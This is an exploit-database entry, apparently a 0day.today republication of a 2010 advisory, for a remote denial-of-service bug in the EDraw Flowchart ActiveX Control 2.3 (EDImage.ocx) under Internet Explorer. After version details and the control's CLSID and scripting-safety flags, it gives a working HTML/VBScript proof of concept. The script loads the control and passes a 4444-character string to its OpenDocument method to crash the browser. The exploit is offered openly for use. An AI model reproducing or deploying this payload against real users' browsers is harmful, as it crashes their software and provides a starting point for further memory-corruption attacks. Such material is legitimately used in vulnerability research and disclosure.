EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) DoS Exploit (IE)

2010-04-22T00:00:00
ID 1337DAY-ID-11934
Type zdt
Reporter LiquidWorm
Modified 2010-04-22T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            =========================================================================
EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) Remote DoS Exploit (IE)
=========================================================================

######################
 
 
 EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) Remote DoS Exploit (IE)
 
 
 Vendor: EdrawSoft - http://www.edrawsoft.com
 
 Platform Used: MS Win XP Pro SP3 (en) / IE 8.0
 
 
 CompanyName        EDrawSoft
 FileDescription    EDraw Flowchart ActiveX Control Module
 FileVersion        2, 3, 0, 6
 InternalName       EDrawSoft
 LegalCopyright     Copyright (C) 2005
 OriginalFileName   EDImage.OCX
 ProductName        EDraw Flowchart ActiveX Control Module
 ProductVersion     2, 3, 0, 6
 
 Report for Clsid: {F685AFD8-A5CC-410E-98E4-BAA1C559BA61}
 RegKey Safe for Script: True
 RegKey Safe for Init: True
 Implements IObjectSafety: False
 
 
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 
 Zero Science Lab - http://www.zeroscience.mk
 
 liquidworm gmail com
 
 
 
 18.04.2010
 
 
 Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4936.php
 
 
######################
 
 
 <object classid='clsid:F685AFD8-A5CC-410E-98E4-BAA1C559BA61' id='thricer' />
 <script language='vbscript'>
 
 targetFile = "C:\PROGRA~1\EDIMAG~1\EDImage.ocx"
 prototype  = "Function OpenDocument ( ByVal filename As String ) As Boolean"
 memberName = "OpenDocument"
 progid     = "EDIMAGELib.EDImage"
 argCount   = 1
 
 arg1=String(4444, "J")
 
 thricer.OpenDocument arg1
 
 </script>



#  0day.today [2018-02-19]  #